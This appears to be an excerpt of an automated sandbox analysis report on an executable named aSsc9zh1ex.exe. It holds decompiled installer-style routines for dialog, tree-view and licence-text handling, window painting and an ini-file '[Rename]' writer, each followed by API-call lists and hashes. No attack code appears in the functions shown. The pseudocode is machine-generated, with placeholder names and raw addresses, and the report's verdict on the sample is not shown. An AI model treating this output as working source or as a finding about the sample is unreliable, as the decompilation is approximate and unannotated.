                        												_t248 = _t254 & 0x000000fe;
                        											} else {
                        												_t248 = _t254 | 0x00000001;
                        											}
                        										}
                        										 *_t301 = _t248;
                        										E0040117D(_t295);
                        										_a12 = _t295 + 1;
                        										_a16 =  !( *0x7a8a78) >> 0x00000008 & 0x00000001;
                        										_a8 = 0x40f;
                        									}
                        								}
                        								goto L41;
                        							}
                        							_t301 = _a16;
                        							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                        								goto L41;
                        							}
                        							goto L33;
                        						} else {
                        							goto L48;
                        						}
                        					} else {
                        						L48:
                        						if(_a8 != 0x111) {
                        							L56:
                        							if(_a8 == 0x200) {
                        								SendMessageW(_v8, 0x200, 0, 0);
                        							}
                        							if(_a8 == 0x40b) {
                        								_t225 =  *0x7a1f2c;
                        								if(_t225 != 0) {
                        									ImageList_Destroy(_t225);
                        								}
                        								_t226 =  *0x7a1f40;
                        								if(_t226 != 0) {
                        									GlobalFree(_t226);
                        								}
                        								 *0x7a1f2c = 0;
                        								 *0x7a1f40 = 0;
                        								 *0x7a8ac0 = 0;
                        							}
                        							if(_a8 != 0x40f) {
                        								L90:
                        								if(_a8 == 0x420 && ( *0x7a8a79 & 0x00000001) != 0) {
                        									_t324 = (0 | _a16 == 0x00000020) << 3;
                        									ShowWindow(_v8, _t324);
                        									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                        								}
                        								goto L93;
                        							} else {
                        								E004011EF(_t301, 0, 0);
                        								_t198 = _a12;
                        								if(_t198 != 0) {
                        									if(_t198 != 0xffffffff) {
                        										_t198 = _t198 - 1;
                        									}
                        									_push(_t198);
                        									_push(8);
                        									E00404EB1();
                        								}
                        								if(_a16 == 0) {
                        									L75:
                        									E004011EF(_t301, 0, 0);
                        									_v36 =  *0x7a1f40;
                        									_t201 =  *0x7a8a88;
                        									_v64 = 0xf030;
                        									_v24 = 0;
                        									if( *0x7a8a8c <= 0) {
                        										L86:
                        										if( *0x7a8b1e == 0x400) {
                        											InvalidateRect(_v8, 0, 1);
                        										}
                        										if( *((intOrPtr*)( *0x7a7a3c + 0x10)) != 0) {
                        											E00404DEC(0x3ff, 0xfffffffb, E00404E04(5));
                        										}
                        										goto L90;
                        									}
                        									_t292 = _t201 + 8;
                        									do {
                        										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                        										if(_t207 != 0) {
                        											_t303 =  *_t292;
                        											_v72 = _t207;
                        											_v76 = 8;
                        											if((_t303 & 0x00000001) != 0) {
                        												_v76 = 9;
                        												_v60 =  &(_t292[4]);
                        												_t292[0] = _t292[0] & 0x000000fe;
                        											}
                        											if((_t303 & 0x00000040) == 0) {
                        												_t211 = (_t303 & 0x00000001) + 1;
                        												if((_t303 & 0x00000010) != 0) {
                        													_t211 = _t211 + 3;
                        												}
                        											} else {
                        												_t211 = 3;
                        											}
                        											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                        											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                        											SendMessageW(_v8, 0x113f, 0,  &_v76);
                        										}
                        										_v24 = _v24 + 1;
                        										_t292 =  &(_t292[0x206]);
                        									} while (_v24 <  *0x7a8a8c);
                        									goto L86;
                        								} else {
                        									_t293 = E004012E2( *0x7a1f40);
                        									E00401299(_t293);
                        									_t222 = 0;
                        									_t301 = 0;
                        									if(_t293 <= 0) {
                        										L74:
                        										SendMessageW(_v12, 0x14e, _t301, 0);
                        										_a16 = _t293;
                        										_a8 = 0x420;
                        										goto L75;
                        									} else {
                        										goto L71;
                        									}
                        									do {
                        										L71:
                        										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                        											_t301 = _t301 + 1;
                        										}
                        										_t222 = _t222 + 1;
                        									} while (_t222 < _t293);
                        									goto L74;
                        								}
                        							}
                        						}
                        						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                        							goto L93;
                        						} else {
                        							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                        							if(_t232 == 0xffffffff) {
                        								goto L93;
                        							}
                        							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                        							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                        								_t294 = 0x20;
                        							}
                        							E00401299(_t294);
                        							SendMessageW(_a4, 0x420, 0, _t294);
                        							_a12 = _a12 | 0xffffffff;
                        							_a16 = 0;
                        							_a8 = 0x40f;
                        							goto L56;
                        						}
                        					}
                        				} else {
                        					_v36 = 0;
                        					_v20 = 2;
                        					 *0x7a8ac0 = _t291;
                        					 *0x7a1f40 = GlobalAlloc(0x40,  *0x7a8a8c << 2);
                        					_t258 = LoadImageW( *0x7a8a60, 0x6e, 0, 0, 0, 0);
                        					 *0x7a1f34 =  *0x7a1f34 | 0xffffffff;
                        					_t297 = _t258;
                        					 *0x7a1f3c = SetWindowLongW(_v8, 0xfffffffc, E004054F0);
                        					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                        					 *0x7a1f2c = _t260;
                        					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                        					SendMessageW(_v8, 0x1109, 2,  *0x7a1f2c);
                        					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                        						SendMessageW(_v8, 0x111b, 0x10, 0);
                        					}
                        					DeleteObject(_t297);
                        					_t298 = 0;
                        					do {
                        						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
                        						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                        							if(_t298 != 0x20) {
                        								_v20 = 0;
                        							}
                        							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E00406557(_t298, 0, _t326, 0, _t266)), _t298);
                        						}
                        						_t298 = _t298 + 1;
                        					} while (_t298 < 0x21);
                        					_t299 = _a16;
                        					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                        					_push(0x15);
                        					E00404476(_a4);
                        					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                        					_push(0x16);
                        					E00404476(_a4);
                        					_t300 = 0;
                        					_v16 = 0;
                        					if( *0x7a8a8c <= 0) {
                        						L19:
                        						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                        						goto L20;
                        					} else {
                        						_t319 = _v24 + 8;
                        						_v32 = _t319;
                        						do {
                        							_t278 =  &(_t319[0x10]);
                        							if( *_t278 != 0) {
                        								_v64 = _t278;
                        								_t279 =  *_t319;
                        								_v88 = _v16;
                        								_t311 = 0x20;
                        								_v84 = 0xffff0002;
                        								_v80 = 0xd;
                        								_v68 = _t311;
                        								_v44 = _t300;
                        								_v72 = _t279 & _t311;
                        								if((_t279 & 0x00000002) == 0) {
                        									if((_t279 & 0x00000004) == 0) {
                        										 *( *0x7a1f40 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                        									} else {
                        										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                        									}
                        								} else {
                        									_v80 = 0x4d;
                        									_v48 = 1;
                        									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                        									_v36 = 1;
                        									 *( *0x7a1f40 + _t300 * 4) = _t284;
                        									_v16 =  *( *0x7a1f40 + _t300 * 4);
                        								}
                        							}
                        							_t300 = _t300 + 1;
                        							_t319 =  &(_v32[0x818]);
                        							_v32 = _t319;
                        						} while (_t300 <  *0x7a8a8c);
                        						if(_v36 != 0) {
                        							L20:
                        							if(_v20 != 0) {
                        								E004044AB(_v8);
                        								goto L23;
                        							} else {
                        								ShowWindow(_v12, 5);
                        								E004044AB(_v12);
                        								L93:
                        								return E004044DD(_a8, _a12, _a16);
                        							}
                        						}
                        						goto L19;
                        					}
                        				}
                        			}

                        0x0040504c

                        APIs
                        • GetDlgItem.USER32 ref: 00404EFB
                        • GetDlgItem.USER32 ref: 00404F06
                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F50
                        • LoadImageW.USER32 ref: 00404F67
                        • SetWindowLongW.USER32(?,000000FC,004054F0), ref: 00404F80
                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404F94
                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FA6
                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404FBC
                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FC8
                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FDA
                        • DeleteObject.GDI32(00000000), ref: 00404FDD
                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405008
                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405014
                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050AF
                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 004050DF
                          • Part of subcall function 004044AB: SendMessageW.USER32(00000028,?,00000001,004042D6), ref: 004044B9
                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050F3
                        • GetWindowLongW.USER32(?,000000F0), ref: 00405121
                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040512F
                        • ShowWindow.USER32(?,00000005), ref: 0040513F
                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040523A
                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040529F
                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052B4
                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052D8
                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004052F8
                        • ImageList_Destroy.COMCTL32(?), ref: 0040530D
                        • GlobalFree.KERNEL32 ref: 0040531D
                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405396
                        • SendMessageW.USER32(?,00001102,?,?), ref: 0040543F
                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040544E
                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00405479
                        • ShowWindow.USER32(?,00000000), ref: 004054C7
                        • GetDlgItem.USER32 ref: 004054D2
                        • ShowWindow.USER32(00000000), ref: 004054D9
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                        • String ID: $M$N
                        • API String ID: 2564846305-813528018
                        • Opcode ID: 175cf0479e418895b067fb807809c06ca34509b835de2015ac728b6654376382
                        • Instruction ID: cd3a3d13ac431be8b4ce3887d4b4ed089ddf64e85d32bcda767c16d05f8e906a
                        • Opcode Fuzzy Hash: 175cf0479e418895b067fb807809c06ca34509b835de2015ac728b6654376382
                        • Instruction Fuzzy Hash: 8D028B70900609AFDB20DFA5CC45EAF7BB5FB85314F10817AE610BA2E1DB798941DF58
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 93%
                        			E00404635(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                        				intOrPtr _v8;
                        				int _v12;
                        				void* _v16;
                        				struct HWND__* _t56;
                        				intOrPtr _t69;
                        				signed int _t75;
                        				signed short* _t76;
                        				signed short* _t78;
                        				long _t92;
                        				int _t103;
                        				signed int _t108;
                        				signed int _t110;
                        				intOrPtr _t113;
                        				WCHAR* _t114;
                        				signed int* _t116;
                        				WCHAR* _t117;
                        				struct HWND__* _t118;
                        
                        				if(_a8 != 0x110) {
                        					__eflags = _a8 - 0x111;
                        					if(_a8 != 0x111) {
                        						L13:
                        						__eflags = _a8 - 0x4e;
                        						if(_a8 != 0x4e) {
                        							__eflags = _a8 - 0x40b;
                        							if(_a8 == 0x40b) {
                        								 *0x79ff14 =  *0x79ff14 + 1;
                        								__eflags =  *0x79ff14;
                        							}
                        							L27:
                        							_t114 = _a16;
                        							L28:
                        							return E004044DD(_a8, _a12, _t114);
                        						}
                        						_t56 = GetDlgItem(_a4, 0x3e8);
                        						_t114 = _a16;
                        						__eflags =  *((intOrPtr*)(_t114 + 8)) - 0x70b;
                        						if( *((intOrPtr*)(_t114 + 8)) == 0x70b) {
                        							__eflags =  *((intOrPtr*)(_t114 + 0xc)) - 0x201;
                        							if( *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                        								_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                        								_t113 =  *((intOrPtr*)(_t114 + 0x18));
                        								_v12 = _t103;
                        								__eflags = _t103 - _t113 - 0x800;
                        								_v16 = _t113;
                        								_v8 = 0x7a6a00;
                        								if(_t103 - _t113 < 0x800) {
                        									SendMessageW(_t56, 0x44b, 0,  &_v16);
                        									SetCursor(LoadCursorW(0, 0x7f02));
                        									_push(1);
                        									E004048E4(_a4, _v8);
                        									SetCursor(LoadCursorW(0, 0x7f00));
                        									_t114 = _a16;
                        								}
                        							}
                        						}
                        						__eflags =  *((intOrPtr*)(_t114 + 8)) - 0x700;
                        						if( *((intOrPtr*)(_t114 + 8)) != 0x700) {
                        							goto L28;
                        						} else {
                        							__eflags =  *((intOrPtr*)(_t114 + 0xc)) - 0x100;
                        							if( *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                        								goto L28;
                        							}
                        							__eflags =  *((intOrPtr*)(_t114 + 0x10)) - 0xd;
                        							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                        								SendMessageW( *0x7a8a68, 0x111, 1, 0);
                        							}
                        							__eflags =  *((intOrPtr*)(_t114 + 0x10)) - 0x1b;
                        							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                        								SendMessageW( *0x7a8a68, 0x10, 0, 0);
                        							}
                        							return 1;
                        						}
                        					}
                        					__eflags = _a12 >> 0x10;
                        					if(_a12 >> 0x10 != 0) {
                        						goto L27;
                        					}
                        					__eflags =  *0x79ff14; // 0x0
                        					if(__eflags != 0) {
                        						goto L27;
                        					}
                        					_t69 =  *0x7a0f20; // 0xa1e104
                        					_t29 = _t69 + 0x14; // 0xa1e118
                        					_t116 = _t29;
                        					__eflags =  *_t116 & 0x00000020;
                        					if(( *_t116 & 0x00000020) == 0) {
                        						goto L27;
                        					}
                        					_t108 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                        					__eflags = _t108;
                        					 *_t116 = _t108;
                        					E00404498(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                        					E004048C0();
                        					goto L13;
                        				} else {
                        					_t117 = _a16;
                        					_t75 =  *(_t117 + 0x30);
                        					if(_t75 < 0) {
                        						_t75 =  *( *0x7a7a3c - 4 + _t75 * 4);
                        					}
                        					_t76 =  *0x7a8a98 + _t75 * 2;
                        					_t110 =  *_t76 & 0x0000ffff;
                        					_a8 = _t110;
                        					_t78 =  &(_t76[1]);
                        					_a16 = _t78;
                        					_v16 = _t78;
                        					_v12 = 0;
                        					_v8 = E004045E6;
                        					if(_t110 != 2) {
                        						_v8 = E004045AC;
                        					}
                        					_push( *((intOrPtr*)(_t117 + 0x34)));
                        					_push(0x22);
                        					E00404476(_a4);
                        					_push( *((intOrPtr*)(_t117 + 0x38)));
                        					_push(0x23);
                        					E00404476(_a4);
                        					CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                        					E00404498( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                        					_t118 = GetDlgItem(_a4, 0x3e8);
                        					E004044AB(_t118);
                        					SendMessageW(_t118, 0x45b, 1, 0);
                        					_t92 =  *( *0x7a8a70 + 0x68);
                        					if(_t92 < 0) {
                        						_t92 = GetSysColor( ~_t92);
                        					}
                        					SendMessageW(_t118, 0x443, 0, _t92);
                        					SendMessageW(_t118, 0x445, 0, 0x4010000);
                        					SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                        					 *0x79ff14 = 0;
                        					SendMessageW(_t118, 0x449, _a8,  &_v16);
                        					 *0x79ff14 = 0;
                        					return 0;
                        				}
                        			}

                        APIs
                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046D3
                        • GetDlgItem.USER32 ref: 004046E7
                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404704
                        • GetSysColor.USER32(?), ref: 00404715
                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404723
                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404731
                        • lstrlenW.KERNEL32(?), ref: 00404736
                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404743
                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404758
                        • GetDlgItem.USER32 ref: 004047B1
                        • SendMessageW.USER32(00000000), ref: 004047B8
                        • GetDlgItem.USER32 ref: 004047E3
                        • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404826
                        • LoadCursorW.USER32(00000000,00007F02), ref: 00404834
                        • SetCursor.USER32(00000000), ref: 00404837
                        • LoadCursorW.USER32(00000000,00007F00), ref: 00404850
                        • SetCursor.USER32(00000000), ref: 00404853
                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404882
                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404894
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                        • String ID: Call$N
                        • API String ID: 3103080414-3438112850
                        • Opcode ID: 733b5ee76d40f44ee13d94ce5730b27edf6232bbb6d7c3eda73f746bb046eca6
                        • Instruction ID: dae4caa8b62e847b2ebc6bc8f7d7cc953444b28573a7dbce8249495b0b2e45c9
                        • Opcode Fuzzy Hash: 733b5ee76d40f44ee13d94ce5730b27edf6232bbb6d7c3eda73f746bb046eca6
                        • Instruction Fuzzy Hash: 5361A0B6900609BFDB10AF60DD85E6A7B69FB85314F00C43AF605B62D0C77CA961CF98
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00406160(void* __ecx) {
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				long _t12;
                        				long _t24;
                        				char* _t31;
                        				int _t37;
                        				void* _t38;
                        				intOrPtr* _t39;
                        				long _t42;
                        				WCHAR* _t44;
                        				void* _t46;
                        				void* _t48;
                        				void* _t49;
                        				void* _t52;
                        				void* _t53;
                        
                        				_t38 = __ecx;
                        				_t44 =  *(_t52 + 0x14);
                        				 *0x7a55e8 = 0x55004e;
                        				 *0x7a55ec = 0x4c;
                        				if(_t44 == 0) {
                        					L3:
                        					_t2 = _t52 + 0x1c; // 0x7a5de8
                        					_t12 = GetShortPathNameW( *_t2, 0x7a5de8, 0x400);
                        					if(_t12 != 0 && _t12 <= 0x400) {
                        						_t37 = wsprintfA(0x7a51e8, "%ls=%ls\r\n", 0x7a55e8, 0x7a5de8);
                        						_t53 = _t52 + 0x10;
                        						E00406557(_t37, 0x400, 0x7a5de8, 0x7a5de8,  *((intOrPtr*)( *0x7a8a70 + 0x128)));
                        						_t12 = E0040600A(0x7a5de8, 0xc0000000, 4);
                        						_t48 = _t12;
                        						 *(_t53 + 0x18) = _t48;
                        						if(_t48 != 0xffffffff) {
                        							_t42 = GetFileSize(_t48, 0);
                        							_t6 = _t37 + 0xa; // 0xa
                        							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                        							if(_t46 == 0 || E0040608D(_t48, _t46, _t42) == 0) {
                        								L18:
                        								return CloseHandle(_t48);
                        							} else {
                        								if(E00405F6F(_t38, _t46, "[Rename]\r\n") != 0) {
                        									_t49 = E00405F6F(_t38, _t21 + 0xa, "\n[");
                        									if(_t49 == 0) {
                        										_t48 =  *(_t53 + 0x18);
                        										L16:
                        										_t24 = _t42;
                        										L17:
                        										E00405FC5(_t24 + _t46, 0x7a51e8, _t37);
                        										SetFilePointer(_t48, 0, 0, 0);
                        										E004060BC(_t48, _t46, _t42 + _t37);
                        										GlobalFree(_t46);
                        										goto L18;
                        									}
                        									_t39 = _t46 + _t42;
                        									_t31 = _t39 + _t37;
                        									while(_t39 > _t49) {
                        										 *_t31 =  *_t39;
                        										_t31 = _t31 - 1;
                        										_t39 = _t39 - 1;
                        									}
                        									_t24 = _t49 - _t46 + 1;
                        									_t48 =  *(_t53 + 0x18);
                        									goto L17;
                        								}
                        								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                        								_t42 = _t42 + 0xa;
                        								goto L16;
                        							}
                        						}
                        					}
                        				} else {
                        					CloseHandle(E0040600A(_t44, 0, 1));
                        					_t12 = GetShortPathNameW(_t44, 0x7a55e8, 0x400);
                        					if(_t12 != 0 && _t12 <= 0x400) {
                        						goto L3;
                        					}
                        				}
                        				return _t12;
                        			}

                        APIs
                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004062FB,?,?), ref: 0040619B
                        • GetShortPathNameW.KERNEL32 ref: 004061A4
                          • Part of subcall function 00405F6F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F7F
                          • Part of subcall function 00405F6F: lstrlenA.KERNEL32(00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB1
                        • GetShortPathNameW.KERNEL32 ref: 004061C1
                        • wsprintfA.USER32 ref: 004061DF
                        • GetFileSize.KERNEL32(00000000,00000000,007A5DE8,C0000000,00000004,007A5DE8,?,?,?,?,?), ref: 0040621A
                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406229
                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406261
                        • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,007A51E8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062B7
                        • GlobalFree.KERNEL32 ref: 004062C8
                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062CF
                          • Part of subcall function 0040600A: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\aSsc9zh1ex.exe,80000000,00000003,?,?,?,?,?,0040385A,?), ref: 0040600E
                          • Part of subcall function 0040600A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040385A,?), ref: 00406030
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                        • String ID: %ls=%ls$[Rename]$Uz$]z$]z
                        • API String ID: 2171350718-2304911260
                        • Opcode ID: 83841883253fd663560c5337fe6472fb083831e0a70ac9398a254b13b8ba3a8f
                        • Instruction ID: 21e35848ad9e0a4f6d0f4344ae9360a4b2933efdadd7627ed2dc2072c6695f7b
                        • Opcode Fuzzy Hash: 83841883253fd663560c5337fe6472fb083831e0a70ac9398a254b13b8ba3a8f
                        • Instruction Fuzzy Hash: 2D313771600715BBD220BB659D48F2B3A5CDF86764F16003EFD42F62C2EA7C9821867D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 90%
                        			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                        				struct tagLOGBRUSH _v16;
                        				struct tagRECT _v32;
                        				struct tagPAINTSTRUCT _v96;
                        				struct HDC__* _t70;
                        				struct HBRUSH__* _t87;
                        				struct HFONT__* _t94;
                        				long _t102;
                        				signed int _t126;
                        				struct HDC__* _t128;
                        				intOrPtr _t130;
                        
                        				if(_a8 == 0xf) {
                        					_t130 =  *0x7a8a70;
                        					_t70 = BeginPaint(_a4,  &_v96);
                        					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                        					_a8 = _t70;
                        					GetClientRect(_a4,  &_v32);
                        					_t126 = _v32.bottom;
                        					_v32.bottom = _v32.bottom & 0x00000000;
                        					while(_v32.top < _t126) {
                        						_a12 = _t126 - _v32.top;
                        						asm("cdq");
                        						asm("cdq");
                        						asm("cdq");
                        						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                        						_t87 = CreateBrushIndirect( &_v16);
                        						_v32.bottom = _v32.bottom + 4;
                        						_a16 = _t87;
                        						FillRect(_a8,  &_v32, _t87);
                        						DeleteObject(_a16);
                        						_v32.top = _v32.top + 4;
                        					}
                        					if( *(_t130 + 0x58) != 0xffffffff) {
                        						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                        						_a16 = _t94;
                        						if(_t94 != 0) {
                        							_t128 = _a8;
                        							_v32.left = 0x10;
                        							_v32.top = 8;
                        							SetBkMode(_t128, 1);
                        							SetTextColor(_t128,  *(_t130 + 0x58));
                        							_a8 = SelectObject(_t128, _a16);
                        							DrawTextW(_t128, 0x7a7a60, 0xffffffff,  &_v32, 0x820);
                        							SelectObject(_t128, _a8);
                        							DeleteObject(_a16);
                        						}
                        					}
                        					EndPaint(_a4,  &_v96);
                        					return 0;
                        				}
                        				_t102 = _a16;
                        				if(_a8 == 0x46) {
                        					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                        					 *((intOrPtr*)(_t102 + 4)) =  *0x7a8a68;
                        				}
                        				return DefWindowProcW(_a4, _a8, _a12, _t102);
                        			}

                        APIs
                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                        • BeginPaint.USER32(?,?), ref: 00401047
                        • GetClientRect.USER32 ref: 0040105B
                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                        • FillRect.USER32 ref: 004010E4
                        • DeleteObject.GDI32(?), ref: 004010ED
                        • CreateFontIndirectW.GDI32(?), ref: 00401105
                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                        • SelectObject.GDI32(00000000,?), ref: 00401140
                        • DrawTextW.USER32(00000000,007A7A60,000000FF,00000010,00000820), ref: 00401156
                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                        • DeleteObject.GDI32(?), ref: 00401165
                        • EndPaint.USER32(?,?), ref: 0040116E
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                        • String ID: F
                        • API String ID: 941294808-1304234792
                        • Opcode ID: 8a25a35e32ca6dce8bd23cc7af0fa44a7ac16e68086679f93291a7c2c2804fa7
                        • Instruction ID: 94ee33a561faf14046f005448635b33146be7beb2ca28ebab25df4912e6f605d
                        • Opcode Fuzzy Hash: 8a25a35e32ca6dce8bd23cc7af0fa44a7ac16e68086679f93291a7c2c2804fa7
                        • Instruction Fuzzy Hash: 9E417C71800209AFCF058FA5DE459AF7BB9FF45315F00802AF991AA1A0CB789A55DFA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 72%
                        			E00406557(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                        				struct _ITEMIDLIST* _v8;
                        				signed int _v12;
                        				signed int _v16;
                        				signed int _v20;
                        				signed int _v24;
                        				signed int _v28;
                        				signed int _t44;
                        				WCHAR* _t45;
                        				signed char _t47;
                        				signed int _t48;
                        				short _t59;
                        				short _t61;
                        				short _t63;
                        				void* _t71;
                        				signed int _t77;
                        				signed int _t78;
                        				short _t81;
                        				short _t82;
                        				signed char _t84;
                        				signed int _t85;
                        				void* _t98;
                        				void* _t104;
                        				intOrPtr* _t105;
                        				void* _t107;
                        				WCHAR* _t108;
                        				void* _t110;
                        
                        				_t107 = __esi;
                        				_t104 = __edi;
                        				_t71 = __ebx;
                        				_t44 = _a8;
                        				if(_t44 < 0) {
                        					_t44 =  *( *0x7a7a3c - 4 + _t44 * 4);
                        				}
                        				_push(_t71);
                        				_push(_t107);
                        				_push(_t104);
                        				_t105 =  *0x7a8a98 + _t44 * 2;
                        				_t45 = 0x7a6a00;
                        				_t108 = 0x7a6a00;
                        				if(_a4 >= 0x7a6a00 && _a4 - 0x7a6a00 >> 1 < 0x800) {
                        					_t108 = _a4;
                        					_a4 = _a4 & 0x00000000;
                        				}
                        				_t81 =  *_t105;
                        				_a8 = _t81;
                        				if(_t81 == 0) {
                        					L43:
                        					 *_t108 =  *_t108 & 0x00000000;
                        					if(_a4 == 0) {
                        						return _t45;
                        					}
                        					return E0040651A(_a4, _t45);
                        				} else {
                        					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                        						_t98 = 2;
                        						_t105 = _t105 + _t98;
                        						if(_t81 >= 4) {
